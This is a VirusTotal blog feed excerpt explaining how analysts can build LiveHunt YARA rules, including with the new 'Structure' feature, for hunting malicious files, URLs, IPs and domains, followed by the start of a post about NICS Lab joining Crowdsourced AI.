<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/4EstLZ7MVpGBCB4iD417qIE_-d1HxQYArAX7Fw6wee7gcGb1v7oKZbPS7Gsxjki1ygTmrSRZWl2e5TAK81yJNkFLATcFlE2idgeT-eK9CBMkdezpbe9IQmwTTN_OzPNsnaXvZdWo6Pkt_MpGR2sekcGRE3JzHbsNtHzUNei-rKYqEFhNny6OumswGFXw4f0" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
</ol>
</div>
<div class="interval_12">As usual, you can find and download the YARA rule in <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara/blob/main/File/Gamaredon_Documents_DavSetCookie_RU.yar" target="_blank">our public repository</a>.
</div>
<h2 style="text-align: left;">Actual limitations
</h2>
<div class="interval_12"> We are aware of the limitations that currently exist when translating fields from VT intelligence to LiveHunt rule and vice versa, and we are working to obtain maximum compatibility between both systems. However, for the moment this could be an advantage as they complement each other.
</div>
<div class="interval_12"> VTI modifiers such as behavior_processes, behavior_created_processes or even behavior are somewhat more generic than the possibilities that LiveHunt currently offers, allowing us to specify whether we want information about the processes created, completed or commands executed.
</div>
<div class="interval_12"> However, something that cannot be used yet in LiveHunt rules is the process tree. On some occasions, dynamic executions of our sandboxes only offer information at the process tree level, which means that this information is not available for our rules. But if you want to search information within the process tree with VT intelligence queries, you can use the “behavior” file modifier. The "behavior" modifier the process tree could be consulted to find information.
</div>
<h2 style="text-align: left;">Wrapping up
</h2>
<div class="interval_12"> Converting VT intelligence queries to LiveHunt rules is getting easier. The recently added "<a href="https://blog.virustotal.com/2023/09/its-all-about-structure-creating-yara.html" target="_blank">structure</a>" feature in LiveHunt allows creating rules in a much simpler way by clicking on the interesting fields, creating the rule conditions for you and eliminating the need to know all available fields in the VT module.
</div>
<div class="interval_12"> This post describes with examples a potential approach that analysts might use for their hunting and monitoring. In particular, using VT Intelligence queries before starting working on a YARA rule is really helpful during the initial fine tuning stage of our condition. This practice minimizes noise and ensures we get quality results before we go for our LiveHunt rule. Finally, a quality VTI query can be translated into a YARA with just a few minor changes.
</div>
<div class="interval_12"> We hope you find this useful, and as always we are happy to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">hear from you</a> any ideas or feedback you would like to share. Happy hunting!
</div>
<div class="interval_12"> <b>References that could be interesting</b></div>
<div class="interval_12">
<ul>
<li>IP address search modifiers: <a href="https://developers.virustotal.com/docs/ip-address-search-modifiers" target="_blank">https://developers.virustotal.com/docs/ip-address-search-modifiers</a></li>
<li>Domain search modifiers: <a href="https://developers.virustotal.com/docs/domain-search-modifiers" target="_blank">https://developers.virustotal.com/docs/domain-search-modifiers</a></li>
<li>File search modifiers: <a href="https://developers.virustotal.com/docs/file-search-modifiers" target="_blank">https://developers.virustotal.com/docs/file-search-modifiers</a></li>
<li>Network hunting: Writing YARA rules for Livehunt: <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">https://developers.virustotal.com/docs/nethunt</a></li>
<li>File hunting: Writing YARA rules for Livehunt: <a href="https://developers.virustotal.com/docs/writing-yara-rules-for-livehunt" target="_blank">https://developers.virustotal.com/docs/writing-yara-rules-for-livehunt</a> </li>
</ul>
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-20432246982960554972023-09-21T18:39:00.000+02:002023-09-21T18:43:44.592+02:00 It's all about the structure! Creating YARA rules by clicking<div class="interval_12">Since we made our (extended) vt module available for LiveHunt YARA rules we understand it is not easy for analysts to keep in mind all the new potential possibilities - too many of them! Our goal is to make YARA rule creation as easy as possible while providing security experts everything they need to make even more powerful rules. Our recently published new <a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank">YARA editor</a>, which incorporates full syntax coloring and auto-complete while you develop your rule, is a first step.</div>
<div class="interval_12">However, we wanted to go further. We already discussed how you can use predefined templates (additionally you can check our <a href="https://www.brighttalk.com/webcast/18282/592177" target="_blank">Threat Hunting with VirusTotal - Episode 4</a> for further examples and ideas), but in this post we want to focus on a terrific new feature when creating rules using the “Structure” of any given object (file, URL, domain or IP).</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-16a72d11-7fff-d1bc-f56f-39c4d2fa8a4e"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 108px; overflow: hidden; width: 624px;"><img height="108" src="https://lh5.googleusercontent.com/Sg0qEdvDF2vwl6sf4ln1nudJ-DDrqtjM2PLVnfFi11VRt8LdbIFRp3FjI-Vzq-Vvw5UWcs1gQTdGc5255yw-rVDTNuEo3VLaAw5WN3oGzSh8KZ6y23QVpcAwomwziXkolm4mS1kNf_-j3TxEDYMzmLU0KO5Y4isdAHy9Jv5KLKph0aKSD3OUWPQh6zOhGK9v6iH2PKVqiUGX1ppR1hQqa60VdO5PjozbcfpDYg" style="margin-left: 0px; margin-top: 0px;" width="850" /></span></span></span></div>
<div class="interval_12">“Structure” provides the full JSON containing all details VirusTotal knows for any given indicator. For instance, you can paste a file hash and you will get full details about its behaviour and metadata. What is better, you can simply click on any field you are interested in, and it will automatically included in a fresh new YARA rule in the editor - no need to remember how to get that particular field in the VT module anymore.</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-e94c91ac-7fff-c584-dcf4-ea6f2a29bc52"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 324px; overflow: hidden; width: 624px;"><img height="324" src="https://lh4.googleusercontent.com/T-_k4syXLVlpraeTk6XUyGO30uHhreoiup0fjVujwLy0R-2YN_XYcS59TD5gcuXBHEB8GHDILPs6UqbJKMJSq6AS8s70ueuJNuRMM4vxiRDS0GGtqyUzAhYRQuN1Zavn9YlBuwO_aEKbqXjTJ-LmZH03FIVAaqR6x5KWCwqI4Ye4WYdfmbzUFayZbJ9D42mXqFD0hLcMyUbf8j0dwNiD_g5ZYgVMMqftJVopWQ" style="margin-left: 0px; margin-top: 0px;" width="860" /></span></span></span></div>
<div class="interval_12">In case you are wondering, this also deals with all kinds of loops. If any of the selected fields needs to be iterated, the correct syntax will automatically be added to your rule.</div>
<div class="interval_12">Let’s check the different object types.</div>
<br />
<h2 style="text-align: left;">Files</h2>
<div class="interval_12">For a file object you will find two different branches in the resulting JSON - behaviour and metadata.</div>
<div class="interval_12">The behaviour key is based on the sample execution in the sandbox. For example, you can create rules based on files written by the malware, files dropped, mutexes created, processes created, sigma results or ATT&CK MITRE results, among others.</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-a83c0bac-7fff-00d1-2fb8-771f6af11823"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 440px; overflow: hidden; width: 467px;"><img height="440" src="https://lh6.googleusercontent.com/Aadi_xwtlxdw-3ZxJKgi17ihkyBKdFXjVZTtE7Hcn0M5YkpxwGg3PDH1Oq9i45GagvY_SoiMrOoSHes6gIxg6fZJepDrPZUGh30_dwSiAD9w1imZQYcXLiT4JRWE5YDO82mw7uJoOg_HV7VGYPqQIX6xEXCT6ihlO6J0OKMiGaQRj3rqHnwfOnbOtkJHmgwaMoEe4XkQ8prh_9r6UnxqdedAGpKuv7dyt7eKTQ" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div>
<div class="interval_12">Let’s suppose that we are interested in creating a new detection logic focused on some specific file written. In that case, we want to open the files_written section and then click on the file that we have observed as suspicious for our rule. Automatically, a new rule pops up with that condition (note that the loop condition was conveniently created for us too).
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-8f4dc5a7-7fff-5d29-a6b8-9b47b1a339e1"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 163px; overflow: hidden; width: 624px;"><img height="163" src="https://lh3.googleusercontent.com/aGG5LFzc2uxxSeJi_Eq8Z_olsA8BAo7D4m9RJDKUdCWBeiAev__HZ7IJCwcstA2ui_EnK1Eqx2aWc-WTPNzQ6nLPDA5RbrvI49xUnZ4PJivME1Z_XrYzbv-wMTN16YZaDeScRTvop5yR-3nb_9oWTdP_5imGrE349jF3Vp_G73UeJenA8JT7nC0wSlggqqN4gFpvnOOBopMYME2LaiiNBZzcon2K-v_ovZf5SA" style="margin-left: 0px; margin-top: 0px;" width="850" /></span></span></span></div>
<div class="interval_12">We can keep editing the rule to adapt it to our needs, like adding additional conditions to detect a specific string or path, another file name, etc.
</div>
<div class="interval_12">If your security posture takes into account the ATT&CK MITRE matrix, maybe you want to create rules adding these fields in your logic, available under the key mitre_attack_techniques branch.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-21187764-7fff-8c7c-f602-2898146cfa09"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 205px; overflow: hidden; width: 624px;"><img height="205" src="https://lh6.googleusercontent.com/DEUjwjL60JNkztBxOE2NeUpX0DiWvd0L3CPvLOngjqFhUeEH21X9BV-INbhsVRwymRrQ6jH2RqXW9qmx6DSs1UaX_We8ETC1clflt-ifO-RZ60ScVBWnrvkSwVu2UZe3h6HJte1gdtwp-ia9QvNlGLmAYp_RQ6jH0358XM1MpCZXWwy0WBGk27PUy_YoUsWp93pR592hk5i18hVAl_J7t3GzgAhwTz6XoDMwBw" style="margin-left: 0px; margin-top: 0px;" width="850" /></span></span></span></div><div class="interval_12">In addition to vt.behaviour, it is also possible to use vt.metadata to create a rule based on file metadata. Under the metadata key, we have a lot of interesting information that we can use to create our rule.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-c99a9f13-7fff-f4fd-2edf-aa895bb8f9b8"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 531px; overflow: hidden; width: 416px;"><img height="531" src="https://lh5.googleusercontent.com/Pd-knfBDuBT8FSyqnNwJ_aUxGJWijLBgx9N4c9xbocxzwXkYfuTs0FkaL79J8pa-DMfkYnAikXOwM3VDF8DgNZdsV2Xxvm_SFegXus5-Qti1lsFLo08PGkFhGlt7Piq2y_7qP_rIzvTwuS1jf4Y-jPv1y5tKOQ00J6GgRYqJmLIN3OSs1UFFa1eq5PafI1HqR0nbIJ1YUbsSyln7JFNPOtHx_e8xYmTh8689RA" style="margin-left: 0px; margin-top: 0px;" width="700" /></span></span></span></div><div class="interval_12">Probably one of the most interesting fields is "itw". Under this key, we can create rules based on ITW communications that we are interested in detecting whether related to IPs, domains or URLs.</div>
<div class="interval_12">For example, we may be interested in files that were downloaded ITW with response code 200, from the Discord CDN and that download binaries but more specifically DLLs.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-c54e468d-7fff-2adc-ef58-58883f9ed97e"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 131px; overflow: hidden; width: 624px;"><img height="131" src="https://lh4.googleusercontent.com/Ubl-9sQaA_6i9UEuhJhMPpylHyfE4fnMSh9jxEhq_G1NBDVA1kVG-YvNn_EzMCaerTnfF4a6bBtUFem8zdWF1YPfBYmGTa128mim7EqH24FYZy9TK42eier50bj_t7-nwfOyeLc4i0iVR_MNoUG_U4Ta14gzXQJwUsmOWVO-Be-zeK4DZafgLrEiKiImxUM4jxXmFVF788Zs-5pf48jyuvF25hiqYNnHd3lWWA" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Another interesting approach could be to hunt for files that are downloaded ITW, but with characteristics that could interest us in the whois of the domain from which it was downloaded. This could be interesting if we are monitoring certain domains that are being registered.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-d8e9cf76-7fff-5593-889a-adde74f3522a"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 624px;"><img height="135" src="https://lh4.googleusercontent.com/RCOnZxKoLY3_5a0qs2u5--1a3eOeNf0dM8tlEAPCafnIxrR2MINN9gVlH3ioN8GU2DdF-SqxGl18EjtnLaYIobWSHRHubPvKdZ9YgQ32tFKW52QPD7YzNDCUKk8zcCmJAx8Mn7rJQ1-rVS6Xike8ujgl0AwHb4r4C1vPtdBILtLrZcipDGHNpiy9EThTnX1ARzmXQQDGxbLzN78aNmOFWPbnRoje8WTApntdAw" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Metadata gives us multiple ways to play to create livehunt rules. From more complex rules using ITW applying filters related to domains, IPS or URLs to more basic things where we can include information from exiftool, submitters, fuzzy hashing, etc.
</div>
<div class="interval_12">Combining the power of metadata and behaviour will result in a quality YARA rule!
</div>
<br />
<h2 style="text-align: left;">URL</h2>
<div class="interval_12">For URLs, under the “net” section in the VT module, you have the possibility to use the keys url, ip and domain as shown on the <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">Netloc summary table</a>. Any field available under these keys can be used to create your URL hunting rule.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-f5c41466-7fff-8c2f-b562-9a0a04d9b668"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 456px; overflow: hidden; width: 623px;"><img height="456" src="https://lh4.googleusercontent.com/Lz8MrSug-c9z0R4dr1bDhPKA6dy0EX-FkaxxH0b6Xzn8_bBBj7mVrfvhetLg4GAZY0-2IUDaWln1syapaYeLyAdvkNE6OMfUbyzRriP_1uYzLJA1JFacd6t2_kBcz6z6JLWVg2-blDAYQRjwrepeNmyi25XeXCex5qwvO4Dl1qELvXlEoSL8q6kWdgV9U-Pv0kFODLAoWQUyAjavJ3A2zAyPyuxnnDSXtHnYqQ" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Some of the features you can use to create your rule include URL response headers, downloaded and communicating files, URL path, domain whois, IP ASN, among others. Just by clicking on the fields you are interested in and adapting them to your needs, you can create a robust rule that helps you follow a campaign you are interested in investigating.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-c953768a-7fff-547d-a3b7-581c5ea84fbb"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 260px; overflow: hidden; width: 624px;"><img height="260" src="https://lh5.googleusercontent.com/8fxAoknccU5clqmIrv3BeWQ170V4EoHRZMq6LiV-12br4DGXUsdsODSJvHOuGQ_C1R9iufpfFmwzSHPMUpjsRey2ja4N0GOZ3w-mfnNN9H2xmaUzoxkC9f0TO5gLh1zZMBL7iijjNVgF7T-rRzegdjJ0IHLKzzhG1_uOzfRULqrk7BKx9Pb7gvBsTDxRraZsN2DnOD2GMhXYS1WcB54x3WGoZAcQENazu10o7w" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">A use case could be that we were interested in discovering new URLs seen in VirusTotal, where the path meets a certain pattern, resolves to a certain network block and the domain registry is a registry known as commonly used to register malicious domains. Finally, to avoid noise we are interested just in new URLs.
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-57e45877-7fff-86a3-048f-2faab961c081"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 228px; overflow: hidden; width: 624px;"><img height="228" src="https://lh5.googleusercontent.com/vajQWvKUhAIcpa_mkPSWw5SX_EBK-KM6hptmbRs8pxm0tuj0S63kXXqOz9DInlAXNh2I76ox6h4fy3ImbJ2qoN144qCo7wDMAQWfRFcIEMQ6U0UQyPkCP1mAnajVpcP2VY44-uymXptiaYuQ6UP-KsMAn3H5FLmcsCtYX_mZKFGiT1ALBcdmSuu2FWd0IX-9S40rXkB8Al0v9Vw3N0TTTweE0N7m95QakMRyfg" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div>
<div class="interval_12">Last rule can match for example an URL used by Gamaredon threat actor.
</div>
<br />
<h2 style="text-align: left;">IP</h2>
<div class="interval_12">The fields available for the IP entity can be found under the the ip key in VT.net. Here you can play with fields such as IP whois, communicating files, netblocks and others.
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-9b40206c-7fff-0908-82a3-d01c342a54fd"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 340px; overflow: hidden; width: 310px;"><img height="340" src="https://lh3.googleusercontent.com/CfZSqZYggvPBNe2Ws1Kanjg-lpQUNnUv8cXKisW-1JEkm7REyj8jVXkifKUB9T7YeW5FJL5v0xr1e10PXWGca5xBJ-VxOjU4uU1QW5pyRm2mw95hIBx2UzOzWpqenBwtuvLcfq1sHHdYCJ7DqeCi4BHEfV6n5QPBz1BiwpBClZhRXGtkmvxYDYkPAUZ9bJdt_Ej1B6hc7dNSuoeAohk5PQsnQMjoz-WVN-4E4A" style="margin-left: 0px; margin-top: 0px;" width="600" /></span></span></span></div>
<div class="interval_12">From here, we can add as much information as we are interested in to identify new ip addresses from suspicious campaigns. The following image is the result of a few clicks on fields containing a specific IP address.
</div><div class="central_img width_90 interval_12"><span id="docs-internal-guid-22d523ac-7fff-fb5e-4e59-8397baffff74"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 465px; overflow: hidden; width: 624px;"><img height="465" src="https://lh3.googleusercontent.com/DzNuWJ4Q9hUN6ViZRuOeC0kITZg8TTvxfPshsJB3PkQFV-zhe5rnylAwAnibW7GzF4tQ6R-Z9CSPPhMoesToPVEvs7Wrvso-lAqCst9QCvnb4H8u_K62yip3b8kx4heB2bywxv0SwGqFnly9nHHXibH1DcrO644NFp2YHlMO1V0QzknXmOvOFlkapvNHa4F4s1pyozfwlG3kEeCczeAJ1lCA60Np4LsdupKzwA" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div>
<div class="interval_12">Let’s suppose we want to identify new IP addresses that belong to a certain ASN (<a href="https://developers.virustotal.com/docs#network-range-helper" target="_blank">here we explain</a> how to calculate a network range) and have some type of communication with PEEXE binaries.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-23b8ba4a-7fff-25b8-9e59-bb034cef2152"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 219px; overflow: hidden; width: 624px;"><img height="219" src="https://lh6.googleusercontent.com/8EpmHtvDujREGrHsTE-tZPZgiBukSmlOV0oa0KrIF1SxRvqnEEhFXoeqji2ciL50qgW3UyQiipYr48nzWBRcKE2UICfvazQbIrBKswHzb8U-fHYaBhkIF0MqLKmvVmTQuWQOxNeP2e8GXXwyolmhUb6Pgr3M8-DgBhPUS9WUuCEZu4A3pOoPZIFtKM-hGlreu1pr4wCRkOVWLKDAwsvDgacw2KCJ_DZCIZ2DuA" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">This type of use case could even be used to monitor certain network ranges that may belong to our organization or customers to identify if a new IP address has any files that carry out communications.
</div>
<br />
<h2 style="text-align: left;">Domain</h2>
<div class="interval_12">Last but not least, we can also use the new Structure functionality with domains. In this case, domains include information about both the domain itself and the IP address it resolves.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-7b43c8cd-7fff-4fb3-0fa6-c7d1c4484707"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 359px; overflow: hidden; width: 303px;"><img height="359" src="https://lh4.googleusercontent.com/K-ACzp6Pi5b9GuLed-dC89c2ehUGiihuq-JFOXilTCtKKDEGlOsuT7cKId3kCYZH8ZuNU8dzfYrmbv5KophjIrz8NFOyfoFtWJHs5BvdUOd3j_xn_vOCtE-Cftz3nWe-41sqN_7TxNy7ClokN0Pc3UJnJtL3aC4wWkXy68qetpqrgmsqxkto5-8R64QR_ULvcw5GX-lIyG1AHrfg_tt7Bydh_NSUIK1xYzYYxA" style="margin-left: 0px; margin-top: 0px;" width="600" /></span></span></span></div><div class="interval_12">And the same process that we have followed with the other entities that we have taken as an example, it would only be enough to click on the fields that interest us and shape our rule.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3fc43b7b-7fff-8141-a257-f62375c942e7"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 243px; overflow: hidden; width: 624px;"><img height="243" src="https://lh5.googleusercontent.com/XAZiAa7j_TjMnsLwHgWVGXJ-5bjgF5YXo-1D2zboOWOcJXfVEP76pvH-V_TvHQR61i-PExF0yIu1Zm33mV37hzxbop702HMVFzWqJrI6CncvK-AJCbNb6au47VsZTHySluknVAtsJthsMYlfBYJaCuOe2Gne0ud-f7s0Rotm59EwjhsWY-XzHIilsgCZdaGxRQF0aFkkrwDZiQ4vfjbxBAUTF5NCURCavKLlBw" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Within the information that we can find within the domains, there is an interesting field called categories. Within these categories we can identify if the domain could be linked to malware, phishing, spyware...
</div>
<div class="interval_12">To create a use case with this field, let's say that we want to discover new domains that are related to phishing, and that the value of the not_before field of the HTTPS certificate is greater than a specific date that we want to search for information.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-26e28d4b-7fff-a3a3-1bfd-6a03f546ed6c"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"><span style="border: none; display: inline-block; height: 155px; overflow: hidden; width: 624px;"><img height="155" src="https://lh6.googleusercontent.com/gN1o6qlST9Kff046fr0r5BnjGMhGtAPI_yFhGrjxV4AVJ3HwveTOGLXuqUbvFjjl7ox2ZicoEVC_jNFIXfDO64yo4A4UNihxiqy_qGj58kMh_raVMlgeRF7Jha_vas-bJIhwN98Q1p_ldwWxcwBlsl8nCoMc4c6KYRmLFBeQNp6o_QLJCiJsC1HlXb_4jO9HezlA7iXTawpa4_7l3YKWewXgGbupLSTMbYATZg" style="margin-left: 0px; margin-top: 0px;" width="800" /></span></span></span></div><div class="interval_12">Another case that we can do also related to phishing is to monitor a specific favicon that is using our brand image. Subsequently, we are also interested in whether it includes a pattern in the domain name or in the alternative name in the certificate.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh4.googleusercontent.com/6Pt9bL9gvppoliaUkn2Z0EK1UV51Hzt_qbRZznMpvj8NkVlwIbWlvOku76nmH6zmZRnpW-h6zAd4zkXg-dej2pdNDYvDfYvLdkP84el_MN9qpM-wSLd-BFJgpQYXLZ8koFJRQztjezxRxF2rdGt4x4WyDrxQdDLEv1jj-RSndkE3u1L1NLrg3nzcRzNjKdKkU974DJ2Z-X8zMW6tgzX5Ip95LohyxiDasLRIAQ" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">At VirusTotal we continue trying to include the greatest number of functionalities that are useful for analysts for threat hunting. Our goal is to make work easier and spend time intelligently when using the platform.
</div>
<div class="interval_12">The idea of this new feature is to continue to add new fields that can be consumed through VirusTotal intelligence to make livehunt rule creation more powerful. It is not easy to remember or know which fields are available within the files to create livehunt rules, so the new "Structure" functionality can help us.
</div>
<div class="interval_12">We want livehunt rules to be a great tool to detect campaign patterns and to be able to track players more powerfully.
</div>
<div class="interval_12">We would also like to announce that we have opened a GitHub where the community can publish their YARA rules and contribute! During the following weeks we will be posting new rules https://github.com/VirusTotal/vt-public-crowdsourced-yara.
</div>
<div class="interval_12">We hope you liked this functionality. Happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-31114789853430910482023-08-04T11:01:00.001+02:002023-08-04T11:06:15.352+02:00Crowdsourced AI += NICS Lab<p>We are pleased to share that <a href="https://www.nics.uma.es/" style="color: #1155cc; text-decoration: none;">NICS Lab</a>, a security research group from the Computer Science Department at the University of Malaga, is joining the Crowdsourced AI initiative at VirusTotal. By extending our capabilities using a different AI model for processing PowerShell files, NICS Lab not only strengthens our collective understanding of the code and its behavior, but also provides verdicts on the potential threat level of each file according to model criteria - categorizing them as malicious, suspicious, or benign.</p>
